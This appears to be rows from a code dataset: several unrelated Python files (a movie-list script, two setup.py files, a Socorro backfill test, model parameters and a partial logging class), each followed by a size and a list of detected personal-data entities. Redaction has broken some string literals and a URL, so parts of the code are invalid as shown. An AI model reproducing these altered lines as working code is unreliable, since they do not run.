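# For context, a minimal sketch of what the media.Movie constructor is assumed
# to look like; the real class lives in media.py and is not shown here:
#
#   class Movie(object):
#       """Stores a movie's title, storyline, poster image URL and trailer URL."""
#       def __init__(self, title, storyline, poster_image_url,
#                    trailer_youtube_url):
#           self.title = title
#           self.storyline = storyline
#           self.poster_image_url = poster_image_url
#           self.trailer_youtube_url = trailer_youtube_url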
# Instances of my favorite movies:
# Deadpool movie: movie title, storyline, poster image and movie trailer
deadpool = media.Movie("Deadpool",
""" Wade Wilson (Ryan Reynolds) is a former Special Forces
operative who now works as a mercenary. His world comes
crashing down when evil scientist Ajax (Ed Skrein)
tortures, disfigures and transforms him into Deadpool.
The rogue experiment leaves Deadpool with accelerated
healing powers and a twisted sense of humor. With help
from mutant allies Colossus and Negasonic Teenage
Warhead (Brianna Hildebrand), Deadpool uses his new
skills to hunt down the man who nearly destroyed
his life""",
"https://www.flickeringmyth.com/wp-content/uploads/2016/01/Deadpool-poster-1.jpg", # NOQA
"https://www.youtube.com/watch?v=Xithigfg7dA"
) # NOQA
# Focus movie: movie title, storyline, poster image and movie trailer
focus = media.Movie("Focus",
"""Nicky (Will Smith), a veteran con artist, takes a
                    novice named Jess (Margot Robbie) under his wing. While
Nicky teaches Jess the tricks of the trade, the pair
become romantically involved; but, when Jess gets
uncomfortably close, Nicky ends their relationship.""",
"http://static.rogerebert.PI:KEY.jpg", # NOQA
"https://www.youtube.com/watch?v=MxCRgtdAuBo"
) # NOQA
# Mechanic: Resurrection movie: movie title, storyline, poster image and
# movie trailer
mechanic = media.Movie("Mechanic: Resurrection",
"""Living under cover in Brazil, master assassin Arthur
Bishop(Jason Statham) springs back into action after an
old enemySam Hazeldine) kidnaps the woman (Jessica Alba)
he loves. To saveher life, Bishop must kill an
imprisoned African warlord, a humantrafficker (Toby
Eddington) and an arms dealer (Tommy Lee Jones),all
while making the deaths look like accidents. When things
don't goexactly as planned, Bishop turns the tables on
the people who forcedhim out of retirement.""",
"https://images-na.ssl-images-amazon.com/images/M/MV5BMjYwODExNzUwMV5BMl5BanBnXkFtZTgwNTgwNjUyOTE@._V1_UY1200_CR90,0,630,1200_AL_.jpg", # NOQA
"https://www.youtube.com/watch?v=G-P3f_wDXvs"
) # NOQA
# Enemy movie: movie title, storyline, poster image and movie trailer
enemy = media.Movie("Enemy",
"""A mild-mannered college professor (Jake Gyllenhaal)
discovers a look-alike actor and delves into the other
man's private affairs.""",
"http://www.impawards.com/intl/misc/2014/posters/enemy.jpg", # NOQA
"https://www.youtube.com/watch?v=FJuaAWrgoUY"
) # NOQA
# Wonder Woman movie: movie title, storyline, poster image and movie trailer
wonder_woman = media.Movie("Wonder Woman",
"""Before she was Wonder Woman (Gal Gadot), she was
Diana, princess ofthe Amazons, trained to be an
unconquerable warrior. Raised on asheltered island
paradise, Diana meets an American pilot (Chris Pine)
who tells her about the massive conflict that's
raging in the outsideworld. Convinced that she can
stop the threat, Diana leaves herhome for the first
time. Fighting alongside men in a war to end
allwars, she finally discovers her full powers and
true destiny""",
"http://cdn2-www.comingsoon.net/assets/uploads/gallery/wonder-woman/wwposter5.jpg", # NOQA
"https://www.youtube.com/watch?v=1Q8fG0TtVAY"
) # NOQA
# Ghost in the Shell movie: movie title, storyline, poster image and movie
# trailer
ghost_in_the_shell = media.Movie("Ghost in the Shell",
"""In the near future, Major is the first of
herkind: a human who iscyber-enhanced to be a
perfect soldier devoted to stopping theworld's
most dangerous criminals. When terrorism
reaches a newlevel that includes the ability
to hack into people's minds and control them,
Major is uniquely qualified to stop it. As
sheprepares to face a new enemy, Major
discovers that her life was stoleninstead of
saved. Now, she will stop at nothing to
recover her pastwhile punishing those who did
this to her.""",
"http://cdn2-www.comingsoon.net/assets/uploads/gallery/ghost-in-the-shell/ghostinshellposter.jpg", # NOQA
"https://www.youtube.com/watch?v=G4VmJcZR0Yg"
) # NOQA
# All instances grouped together in a list
# The list is the set of movies that will be passed to fav_movies_web below
movies = [
deadpool,
focus,
mechanic,
enemy, wonder_woman,
ghost_in_the_shell
]
# Open the HTML page in a web browser via fav_movies_web.py
fav_movies_web.open_movies_page(movies) # the array/list (argument)
| 4,766 | [['PERSON', 'sotryline'], ['PERSON', 'Wade Wilson'], ['PERSON', 'Ryan Reynolds'], ['PERSON', 'Ajax'], ['PERSON', 'Ed Skrein'], ['PERSON', 'Deadpool'], ['PERSON', 'Brianna Hildebrand'], ['PERSON', 'Deadpool'], ['PERSON', 'sotryline'], ['PERSON', 'Nicky'], ['PERSON', 'Will Smith'], ['PERSON', 'Jess(Margot Robbie'], ['PERSON', 'Nicky'], ['PERSON', 'Jess'], ['PERSON', 'Jess'], ['PERSON', 'Nicky'], ['PERSON', 'sotryline'], ['LOCATION', 'Brazil'], ['PERSON', 'Arthur\n Bishop(Jason Statham'], ['PERSON', 'Hazeldine'], ['PERSON', 'Jessica Alba'], ['NRP', 'African'], ['PERSON', 'Tommy Lee Jones),all'], ['PERSON', 'sotryline'], ['PERSON', 'Movie("Enemy'], ['PERSON', 'Jake Gyllenhaal'], ['PERSON', 'sotryline'], ['PERSON', 'Gal Gadot'], ['PERSON', 'Diana'], ['PERSON', 'Diana'], ['NRP', 'American'], ['PERSON', 'Chris Pine'], ['PERSON', 'Diana'], ['PERSON', 'herhome'], ['PERSON', 'sotryline'], ['URL', 'https://www.flickeringmyth.com/wp-content/uploads/2016/01/Deadpool-poster-1.jpg",'], ['URL', 'https://www.youtube.com/watch?v=Xithigfg7dA"'], ['URL', 'http://static.ro'], ['URL', 'https://www.youtube.com/watch?v=MxCRgtdAuBo"'], ['URL', 'https://images-na.ssl-images-amazon.com/images/M/MV5BMjYwODExNzUwMV5BMl5BanBnXkFtZTgwNTgwNjUyOTE@._V1_UY1200_CR90,0,630,1200_AL_.jpg",'], ['URL', 'https://www.youtube.com/watch?v=G-P3f_wDXvs"'], ['URL', 'http://www.impawards.com/intl/misc/2014/posters/enemy.jpg",'], ['URL', 'https://www.youtube.com/watch?v=FJuaAWrgoUY"'], ['URL', 'http://cdn2-www.comingsoon.net/assets/uploads/gallery/wonder-woman/wwposter5.jpg",'], ['URL', 'https://www.youtube.com/watch?v=1Q8fG0TtVAY"'], ['URL', 'http://cdn2-www.comingsoon.net/assets/uploads/gallery/ghost-in-the-shell/ghostinshellposter.jpg",'], ['URL', 'https://www.youtube.com/watch?v=G4VmJcZR0Yg"'], ['URL', 'media.Mo'], ['URL', 'media.Mo'], ['URL', 'KEY.jp'], ['URL', 'media.Mo'], ['URL', 'media.Mo'], ['URL', 'media.Mo'], ['URL', 'media.Mo'], ['URL', 'web.py']] |
16 | #!/usr/bin/env python
import glob
import numpy as np
try:
from setuptools import setup
have_setuptools = True
except ImportError:
from distutils.core import setup
have_setuptools = False
try:
from Cython.Build import cythonize
have_cython = True
except ImportError:
have_cython = False
kwargs = {'name': 'openmc',
'version': '0.8.0',
'packages': ['openmc', 'openmc.data', 'openmc.mgxs', 'openmc.model',
'openmc.stats'],
'scripts': glob.glob('scripts/openmc-*'),
# Metadata
'author': 'Will Boyd',
'author_email': dummy@email.com',
'description': 'OpenMC Python API',
'url': 'https://github.com/mit-crpg/openmc',
'classifiers': [
'Intended Audience :: Developers',
'Intended Audience :: End Users/Desktop',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Programming Language :: Python',
'Topic :: Scientific/Engineering'
]}
if have_setuptools:
kwargs.update({
# Required dependencies
'install_requires': ['six', 'numpy>=1.9', 'h5py', 'matplotlib'],
# Optional dependencies
'extras_require': {
'decay': ['uncertainties'],
'pandas': ['pandas>=0.17.0'],
            'sparse': ['scipy'],
'vtk': ['vtk', 'silomesh'],
'validate': ['lxml']
},
# Data files
'package_data': {
'openmc.data': ['mass.mas12', 'fission_Q_data_endfb71.h5']
},
})
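# With the extras defined above, optional dependency sets can be pulled in at
# install time via pip's extras syntax (assumed invocation):
#   pip install .[pandas,sparse,validate]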
# If Cython is present, add resonance reconstruction capability
if have_cython:
kwargs.update({
'ext_modules': cythonize('openmc/data/reconstruct.pyx'),
'include_dirs': [np.get_include()]
})
setup(**kwargs)
| 1,920 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', "https://github.com/mit-crpg/openmc',"], ['PERSON', 'openmc'], ['PERSON', "Will Boyd'"], ['PERSON', 'lxml'], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ' :: '], ['URL', 'distutils.co'], ['URL', 'openmc.mg'], ['URL', 'openmc.mo'], ['URL', 'openmc.st'], ['URL', 'glob.gl'], ['URL', 'email.com'], ['URL', 'mass.ma'], ['URL', 'reconstruct.py'], ['URL', 'np.ge']] |
17 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import codecs
from setuptools import setup
def read(fname):
file_path = os.path.join(os.path.dirname(__file__), fname)
return codecs.open(file_path, encoding='utf-8').read()
setup(
name='pytest-concurrent',
version='0.2.2',
author='James Wang, Reverb Chu',
author_email='jamesw96@uw.edu, dummy@email.com',
maintainer='James Wang, Reverb Chu',
maintainer_email='jamesw96@uw.edu, dummy@email.com',
license='MIT',
url='https://github.com/reverbc/pytest-concurrent',
description='Concurrently execute test cases with multithread'
', multiprocess and gevent',
long_description=read('README.rst'),
packages=['pytest_concurrent', 'pytest_concurrent.modes'],
install_requires=[
'pytest>=3.1.1',
'psutil>=5.2.2'],
classifiers=[
'Development Status :: 4 - Beta',
'Framework :: Pytest',
'Intended Audience :: Developers',
'Topic :: Software Development :: Testing',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: Implementation :: CPython',
'Operating System :: OS Independent',
'License :: OSI Approved :: MIT License',
],
entry_points={
'pytest11': [
'concurrent = pytest_concurrent.plugin',
],
},
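    # pytest discovers plugins via the 'pytest11' entry-point group above, so
    # simply installing this package activates the plugin; no conftest import
    # is required.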
setup_requires=['pytest-runner'],
tests_require=['pytest'],
)
| 1,681 | [['EMAIL_ADDRESS', "author_email='jamesw96@uw.edu"], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', "maintainer_email='jamesw96@uw.edu"], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', "author='James Wang"], ['PERSON', "Reverb Chu'"], ['PERSON', "maintainer='James Wang"], ['PERSON', "Reverb Chu'"], ['URL', "https://github.com/reverbc/pytest-concurrent',"], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ' :: '], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'uw.edu'], ['URL', 'email.com'], ['URL', 'uw.edu'], ['URL', 'email.com'], ['URL', 'README.rs'], ['URL', 'concurrent.mo'], ['URL', 'concurrent.pl']] |
18 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from .unittestbase import PostgreSQLTestCase
from nose.plugins.attrib import attr
from nose.tools import eq_, assert_raises
import datetime
from socorro.external.postgresql.backfill import Backfill
from socorro.external.postgresql import staticdata, fakedata
from socorro.external import MissingArgumentError
from socorro.lib import datetimeutil
#==============================================================================
@attr(integration='postgres')
class TestBackfill(PostgreSQLTestCase):
"""Tests the calling of all backfill functions"""
#--------------------------------------------------------------------------
def setUp(self):
""" Populate tables with fake data """
super(TestBackfill, self).setUp()
cursor = self.connection.cursor()
self.tables = []
for table in staticdata.tables + fakedata.tables:
# staticdata has no concept of duration
if table.__module__ == 'socorro.external.postgresql.staticdata':
table = table()
else:
table = table(days=1)
table.releases = {
'WaterWolf': {
'channels': {
'Nightly': {
'versions': [{
'number': '18.0',
'probability': 0.5,
'buildid': '%s000020'
}],
'adu': '10',
'repository': 'nightly',
'throttle': '1',
'update_channel': 'nightly',
},
},
'crashes_per_hour': '5',
'guid': dummy@email.com'
},
'B2G': {
'channels': {
'Nightly': {
'versions': [{
'number': '18.0',
'probability': 0.5,
'buildid': '%s000020'
}],
'adu': '10',
'repository': 'nightly',
'throttle': '1',
'update_channel': 'nightly',
},
},
'crashes_per_hour': '5',
'guid': dummy@email.com'
}
}
table_name = table.table
table_columns = table.columns
values = str(tuple(["%(" + i + ")s" for i in table_columns]))
columns = str(tuple(table_columns))
self.tables.append(table_name)
            # TODO: backfill_reports_clean() sometimes tries to insert an
            # os_version_id that already exists
            if table_name != "os_versions":
for rows in table.generate_rows():
data = dict(zip(table_columns, rows))
query = "INSERT INTO %(table)s " % {'table': table_name}
query = query + columns.replace("'", "").replace(",)", ")")
query = query + " VALUES "
query = query + values.replace(",)", ")").replace("'", "")
cursor.execute(query, data)
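                    # For a table 'foo' with columns (a, b), the string
                    # munging above yields:
                    #   INSERT INTO foo (a, b) VALUES (%(a)s, %(b)s)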
self.connection.commit()
#--------------------------------------------------------------------------
def tearDown(self):
""" Cleanup the database, delete tables and functions """
cursor = self.connection.cursor()
tables = str(self.tables).replace("[", "").replace("]", "")
cursor.execute("TRUNCATE " + tables.replace("'", "") + " CASCADE;")
self.connection.commit()
self.connection.close()
super(TestBackfill, self).tearDown()
#--------------------------------------------------------------------------
def setup_data(self):
self.now = datetimeutil.utc_now()
now = self.now.date()
yesterday = now - datetime.timedelta(days=1)
lastweek = now - datetime.timedelta(days=7)
now_str = datetimeutil.date_to_string(now)
yesterday_str = datetimeutil.date_to_string(yesterday)
lastweek_str = datetimeutil.date_to_string(lastweek)
self.test_source_data = {
# Test backfill_adu
'adu': {
'params': {
"update_day": yesterday_str,
},
'res_expected': [(True,)],
},
# Test backfill_all_dups
'all_dups': {
'params': {
"start_date": yesterday_str,
"end_date": now_str,
},
'res_expected': [(True,)],
},
# Test backfill_build_adu
'build_adu': {
'params': {
"update_day": yesterday_str,
},
'res_expected': [(True,)],
},
# Test backfill_correlations
'correlations': {
'params': {
"update_day": yesterday_str,
},
'res_expected': [(True,)],
},
# Test backfill_crashes_by_user_build
'crashes_by_user_build': {
'params': {
"update_day": yesterday_str,
},
'res_expected': [(True,)],
},
# Test backfill_crashes_by_user
'crashes_by_user': {
'params': {
"update_day": yesterday_str,
},
'res_expected': [(True,)],
},
            # TODO: Test backfill_daily_crashes tries to insert into a table
            # that does not exist. It can be fixed by creating a temporary one.
#'daily_crashes': {
# 'params': {
# "update_day": now_str,
# },
# 'res_expected': [(True,)],
# },
# Test backfill_exploitability
'exploitability': {
'params': {
"update_day": yesterday_str,
},
'res_expected': [(True,)],
},
# Test backfill_explosiveness
'explosiveness': {
'params': {
"update_day": yesterday_str,
},
'res_expected': [(True,)],
},
# Test backfill_home_page_graph_build
'home_page_graph_build': {
'params': {
"update_day": yesterday_str,
},
'res_expected': [(True,)],
},
# Test backfill_home_page_graph
'home_page_graph': {
'params': {
"update_day": yesterday_str,
},
'res_expected': [(True,)],
},
# Test backfill_matviews
'matviews': {
'params': {
"start_date": yesterday_str,
"reports_clean": 'false',
},
'res_expected': [(True,)],
},
# Test backfill_nightly_builds
'nightly_builds': {
'params': {
"update_day": yesterday_str,
},
'res_expected': [(True,)],
},
# Test backfill_rank_compare
'rank_compare': {
'params': {
"update_day": yesterday_str,
},
'res_expected': [(True,)],
},
# Test backfill_reports_clean
'reports_clean': {
'params': {
"start_date": yesterday_str,
"end_date": now_str,
},
'res_expected': [(True,)],
},
            # TODO: Test backfill_reports_duplicates tries to insert into a
            # table that does not exist. It can be fixed by using the update
            # function inside the backfill.
#'reports_duplicates': {
# 'params': {
# "start_date": yesterday_str,
# "end_date": now_str,
# },
# 'res_expected': [(True,)],
# },
            # TODO: Test backfill_signature_counts tries to insert into
            # tables and to call update functions that do not exist.
#'signature_counts': {
# 'params': {
# "start_date": yesterday_str,
# "end_date": now_str,
# },
# 'res_expected': [(True,)],
# },
# Test backfill_tcbs_build
'tcbs_build': {
'params': {
"update_day": yesterday_str,
},
'res_expected': [(True,)],
},
# Test backfill_tcbs
'tcbs': {
'params': {
"update_day": yesterday_str,
},
'res_expected': [(True,)],
},
# Test backfill_weekly_report_partitions
'weekly_report_partitions': {
'params': {
"start_date": lastweek_str,
"end_date": now_str,
"table_name": 'raw_crashes',
},
'res_expected': [(True,)],
},
# TODO: Update Backfill to support signature_summary backfill
# through the API
#'signature_summary_products': {
# 'params': {
# "update_day": yesterday_str,
# },
# 'res_expected': [(True,)],
#},
#'signature_summary_installations': {
# 'params': {
# "update_day": yesterday_str,
# },
# 'res_expected': [(True,)],
#},
#'signature_summary_uptime': {
# 'params': {
# "update_day": yesterday_str,
# },
# 'res_expected': [(True,)],
#},
#'signature_summary_os': {
# 'params': {
# "update_day": yesterday_str,
# },
# 'res_expected': [(True,)],
#},
#'signature_summary_process_type': {
# 'params': {
# "update_day": yesterday_str,
# },
# 'res_expected': [(True,)],
#},
#'signature_summary_architecture': {
# 'params': {
# "update_day": yesterday_str,
# },
# 'res_expected': [(True,)],
#},
#'signature_summary_flash_version': {
# 'params': {
# "update_day": yesterday_str,
# },
# 'res_expected': [(True,)],
#},
#'signature_summary_device': {
# 'params': {
# "update_day": yesterday_str,
# },
# 'res_expected': [(True,)],
#},
#'signature_summary_graphics': {
# 'params': {
# "update_day": yesterday_str,
# },
# 'res_expected': [(True,)],
#},
}
#--------------------------------------------------------------------------
def test_get(self):
backfill = Backfill(config=self.config)
#......................................................................
# Test raise error if kind of backfill is not passed
params = {"backfill_type": ''}
assert_raises(MissingArgumentError, backfill.get, **params)
#......................................................................
# Test all the backfill functions
self.setup_data()
for test, data in self.test_source_data.items():
data['params']['backfill_type'] = str(test)
res = backfill.get(**data['params'])
eq_(res[0], data['res_expected'][0])
| 12,516 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['LOCATION', 'staticdata.tables'], ['PERSON', 'table.releases'], ['PERSON', 'adu'], ['PERSON', 'crashes_per_hour'], ['PERSON', 'adu'], ['PERSON', 'crashes_per_hour'], ['PERSON', 'table_columns ='], ['DATE_TIME', 'yesterday'], ['LOCATION', 'lastweek_str'], ['LOCATION', 'datetimeutil.date_to_string(lastweek'], ['PERSON', 'TODO'], ['PERSON', 'TODO'], ['LOCATION', 'lastweek_str'], ['PERSON', 'signature_summary_device'], ['URL', 'http://mozilla.org/MPL/2.0/.'], ['URL', 'nose.plugins.at'], ['URL', 'nose.to'], ['URL', 'socorro.external.postgresql.ba'], ['URL', 'socorro.li'], ['URL', 'self.connection.cu'], ['URL', 'socorro.external.postgresql.st'], ['URL', 'table.re'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'table.co'], ['URL', 'table.ge'], ['URL', 'columns.re'], ['URL', 'values.re'], ['URL', 'self.connection.com'], ['URL', 'self.connection.cu'], ['URL', 'tables.re'], ['URL', 'self.connection.com'], ['URL', 'self.connection.cl'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.co'], ['URL', 'backfill.ge'], ['URL', 'self.se'], ['URL', 'data.it'], ['URL', 'backfill.ge']] |
19 | # -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) 2015, Nicolas P. Rougier
# Distributed under the (new) BSD License.
#
# Contributors: Nicolas P. Rougier (dummy@email.com)
# -----------------------------------------------------------------------------
# --- Time ---
ms = 0.001
dt = 1*ms
tau = 10*ms
# --- Learning ---
alpha_CUE = 0.050
alpha_LTP = 0.002
alpha_LTD = 0.001
# --- Sigmoid ---
Vmin = 0
Vmax = 20
Vh = 16
Vc = 3
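# These four constants presumably parameterize a logistic activation of the
# form used in Rougier-style basal-ganglia models (an assumption; the actual
# function lives elsewhere in the model code):
#
#   sigmoid(V) = Vmin + (Vmax - Vmin) / (1 + exp((Vh - V) / Vc))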
# --- Model ---
decision_threshold = 40
noise = 0.001
CTX_rest = -3.0
STR_rest = 0.0
STN_rest = -10.0
GPI_rest = 10.0
THL_rest = -40.0
# --- Cues & Rewards ---
V_cue = 7
rewards = 3/3.,2/3.,1/3.,0/3.
# -- Weight ---
Wmin = 0.25
Wmax = 0.75
gains = { "CTX.cog -> STR.cog" : +1.0,
"CTX.mot -> STR.mot" : +1.0,
"CTX.ass -> STR.ass" : +1.0,
"CTX.cog -> STR.ass" : +0.2,
"CTX.mot -> STR.ass" : +0.2,
"CTX.cog -> STN.cog" : +1.0,
"CTX.mot -> STN.mot" : +1.0,
"STR.cog -> GPI.cog" : -2.0,
"STR.mot -> GPI.mot" : -2.0,
"STR.ass -> GPI.cog" : -2.0,
"STR.ass -> GPI.mot" : -2.0,
"STN.cog -> GPI.cog" : +1.0,
"STN.mot -> GPI.mot" : +1.0,
"GPI.cog -> THL.cog" : -0.25,
"GPI.mot -> THL.mot" : -0.25,
"THL.cog -> CTX.cog" : +0.4,
"THL.mot -> CTX.mot" : +0.4,
"CTX.cog -> THL.cog" : +0.1,
"CTX.mot -> THL.mot" : +0.1,
"CTX.mot -> CTX.mot" : +0.5,
"CTX.cog -> CTX.cog" : +0.5,
"CTX.ass -> CTX.ass" : +0.5,
"CTX.ass -> CTX.cog" : +0.01,
"CTX.ass -> CTX.mot" : +0.025,
"CTX.cog -> CTX.ass" : +0.025,
"CTX.mot -> CTX.ass" : +0.01,
}
| 1,837 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2015'], ['PERSON', 'Nicolas P. Rougier'], ['PERSON', 'Nicolas P. Rougier'], ['PERSON', 'Vmin'], ['PERSON', 'Vmax'], ['PERSON', 'Wmax'], ['URL', 'email.com'], ['URL', 'CTX.co'], ['URL', 'STR.co'], ['URL', 'CTX.mo'], ['URL', 'STR.mo'], ['URL', 'CTX.as'], ['URL', 'STR.as'], ['URL', 'CTX.co'], ['URL', 'STR.as'], ['URL', 'CTX.mo'], ['URL', 'STR.as'], ['URL', 'CTX.co'], ['URL', 'STN.co'], ['URL', 'CTX.mo'], ['URL', 'STN.mo'], ['URL', 'STR.co'], ['URL', 'GPI.co'], ['URL', 'STR.mo'], ['URL', 'GPI.mo'], ['URL', 'STR.as'], ['URL', 'GPI.co'], ['URL', 'STR.as'], ['URL', 'GPI.mo'], ['URL', 'STN.co'], ['URL', 'GPI.co'], ['URL', 'STN.mo'], ['URL', 'GPI.mo'], ['URL', 'GPI.co'], ['URL', 'THL.co'], ['URL', 'GPI.mo'], ['URL', 'THL.mo'], ['URL', 'THL.co'], ['URL', 'CTX.co'], ['URL', 'THL.mo'], ['URL', 'CTX.mo'], ['URL', 'CTX.co'], ['URL', 'THL.co'], ['URL', 'CTX.mo'], ['URL', 'THL.mo'], ['URL', 'CTX.mo'], ['URL', 'CTX.mo'], ['URL', 'CTX.co'], ['URL', 'CTX.co'], ['URL', 'CTX.as'], ['URL', 'CTX.as'], ['URL', 'CTX.as'], ['URL', 'CTX.co'], ['URL', 'CTX.as'], ['URL', 'CTX.mo'], ['URL', 'CTX.co'], ['URL', 'CTX.as'], ['URL', 'CTX.mo'], ['URL', 'CTX.as']] |
20 | # encoding: utf-8
#
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
#
# Contact: Kyle Lahnakoski (dummy@email.com)
#
from __future__ import absolute_import, division, unicode_literals
import os
import platform
import sys
from datetime import datetime
from mo_dots import Data, FlatList, coalesce, is_data, is_list, listwrap, unwraplist, wrap
from mo_future import PY3, is_text, text
from mo_logs import constants, exceptions, strings
from mo_logs.exceptions import Except, LogItem, suppress_exception
from mo_logs.strings import CR, indent
_Thread = None
if PY3:
STDOUT = sys.stdout.buffer
else:
STDOUT = sys.stdout
class Log(object):
"""
FOR STRUCTURED LOGGING AND EXCEPTION CHAINING
"""
trace = False
main_log = None
logging_multi = None
profiler = None # simple pypy-friendly profiler
error_mode = False # prevent error loops
@classmethod
def start(cls, settings=None):
"""
RUN ME FIRST TO SETUP THE THREADED LOGGING
http://victorlin.me/2012/08/good-logging-practice-in-python/
log - LIST OF PARAMETERS FOR LOGGER(S)
trace - SHOW MORE DETAILS IN EVERY LOG LINE (default False)
cprofile - True==ENABLE THE C-PROFILER THAT COMES WITH PYTHON (default False)
USE THE LONG FORM TO SET THE FILENAME {"enabled": True, "filename": "cprofile.tab"}
profile - True==ENABLE pyLibrary SIMPLE PROFILING (default False) (eg with Profiler("some description"):)
USE THE LONG FORM TO SET FILENAME {"enabled": True, "filename": "profile.tab"}
constants - UPDATE MODULE CONSTANTS AT STARTUP (PRIMARILY INTENDED TO CHANGE DEBUG STATE)
"""
global _Thread
if not settings:
return
settings = wrap(settings)
Log.stop()
cls.settings = settings
cls.trace = coalesce(settings.trace, False)
if cls.trace:
from mo_threads import Thread as _Thread
_ = _Thread
# ENABLE CPROFILE
if settings.cprofile is False:
settings.cprofile = {"enabled": False}
elif settings.cprofile is True:
if isinstance(settings.cprofile, bool):
settings.cprofile = {"enabled": True, "filename": "cprofile.tab"}
if settings.cprofile.enabled:
from mo_threads import profiles
profiles.enable_profilers(settings.cprofile.filename)
if settings.profile is True or (is_data(settings.profile) and settings.profile.enabled):
Log.error("REMOVED 2018-09-02, Activedata revision 3f30ff46f5971776f8ba18")
# from mo_logs import profiles
#
# if isinstance(settings.profile, bool):
# profiles.ON = True
# settings.profile = {"enabled": True, "filename": "profile.tab"}
#
# if settings.profile.enabled:
# profiles.ON = True
if settings.constants:
constants.set(settings.constants)
logs = coalesce(settings.log, settings.logs)
if logs:
cls.logging_multi = StructuredLogger_usingMulti()
for log in listwrap(logs):
Log.add_log(Log.new_instance(log))
from mo_logs.log_usingThread import StructuredLogger_usingThread
cls.main_log = StructuredLogger_usingThread(cls.logging_multi)
@classmethod
def stop(cls):
"""
DECONSTRUCTS ANY LOGGING, AND RETURNS TO DIRECT-TO-stdout LOGGING
        EXECUTING MULTIPLE TIMES IN A ROW IS SAFE; IT HAS NO NET EFFECT, IT STILL LOGS TO stdout
:return: NOTHING
"""
main_log, cls.main_log = cls.main_log, StructuredLogger_usingStream(STDOUT)
main_log.stop()
@classmethod
def new_instance(cls, settings):
settings = wrap(settings)
if settings["class"]:
if settings["class"].startswith("logging.handlers."):
from mo_logs.log_usingHandler import StructuredLogger_usingHandler
return StructuredLogger_usingHandler(settings)
else:
with suppress_exception:
from mo_logs.log_usingLogger import make_log_from_settings
return make_log_from_settings(settings)
# OH WELL :(
if settings.log_type == "logger":
from mo_logs.log_usingLogger import StructuredLogger_usingLogger
return StructuredLogger_usingLogger(settings)
if settings.log_type == "file" or settings.file:
return StructuredLogger_usingFile(settings.file)
if settings.log_type == "file" or settings.filename:
return StructuredLogger_usingFile(settings.filename)
if settings.log_type == "console":
from mo_logs.log_usingThreadedStream import StructuredLogger_usingThreadedStream
return StructuredLogger_usingThreadedStream(STDOUT)
if settings.log_type == "mozlog":
from mo_logs.log_usingMozLog import StructuredLogger_usingMozLog
return StructuredLogger_usingMozLog(STDOUT, coalesce(settings.app_name, settings.appname))
if settings.log_type == "stream" or settings.stream:
from mo_logs.log_usingThreadedStream import StructuredLogger_usingThreadedStream
return StructuredLogger_usingThreadedStream(settings.stream)
if settings.log_type == "elasticsearch" or settings.stream:
from mo_logs.log_usingElasticSearch import StructuredLogger_usingElasticSearch
return StructuredLogger_usingElasticSearch(settings)
if settings.log_type == "email":
from mo_logs.log_usingEmail import StructuredLogger_usingEmail
return StructuredLogger_usingEmail(settings)
if settings.log_type == "ses":
from mo_logs.log_usingSES import StructuredLogger_usingSES
return StructuredLogger_usingSES(settings)
if settings.log_type.lower() in ["nothing", "none", "null"]:
from mo_logs.log_usingNothing import StructuredLogger
return StructuredLogger()
Log.error("Log type of {{log_type|quote}} is not recognized", log_type=settings.log_type)
@classmethod
def add_log(cls, log):
cls.logging_multi.add_log(log)
@classmethod
def note(
cls,
template,
default_params={},
stack_depth=0,
log_context=None,
**more_params
):
"""
:param template: *string* human readable string with placeholders for parameters
:param default_params: *dict* parameters to fill in template
:param stack_depth: *int* how many calls you want popped off the stack to report the *true* caller
:param log_context: *dict* extra key:value pairs for your convenience
:param more_params: *any more parameters (which will overwrite default_params)
:return:
"""
timestamp = datetime.utcnow()
if not is_text(template):
Log.error("Log.note was expecting a unicode template")
Log._annotate(
LogItem(
context=exceptions.NOTE,
format=template,
template=template,
params=dict(default_params, **more_params)
),
timestamp,
stack_depth+1
)
@classmethod
def unexpected(
cls,
template,
default_params={},
cause=None,
stack_depth=0,
log_context=None,
**more_params
):
"""
:param template: *string* human readable string with placeholders for parameters
:param default_params: *dict* parameters to fill in template
:param cause: *Exception* for chaining
:param stack_depth: *int* how many calls you want popped off the stack to report the *true* caller
:param log_context: *dict* extra key:value pairs for your convenience
:param more_params: *any more parameters (which will overwrite default_params)
:return:
"""
timestamp = datetime.utcnow()
if not is_text(template):
Log.error("Log.warning was expecting a unicode template")
if isinstance(default_params, BaseException):
cause = default_params
default_params = {}
if "values" in more_params.keys():
Log.error("Can not handle a logging parameter by name `values`")
params = Data(dict(default_params, **more_params))
cause = unwraplist([Except.wrap(c) for c in listwrap(cause)])
trace = exceptions.get_stacktrace(stack_depth + 1)
e = Except(exceptions.UNEXPECTED, template=template, params=params, cause=cause, trace=trace)
Log._annotate(
e,
timestamp,
stack_depth+1
)
@classmethod
def alarm(
cls,
template,
default_params={},
stack_depth=0,
log_context=None,
**more_params
):
"""
:param template: *string* human readable string with placeholders for parameters
:param default_params: *dict* parameters to fill in template
:param stack_depth: *int* how many calls you want popped off the stack to report the *true* caller
:param log_context: *dict* extra key:value pairs for your convenience
:param more_params: more parameters (which will overwrite default_params)
:return:
"""
timestamp = datetime.utcnow()
format = ("*" * 80) + CR + indent(template, prefix="** ").strip() + CR + ("*" * 80)
Log._annotate(
LogItem(
context=exceptions.ALARM,
format=format,
template=template,
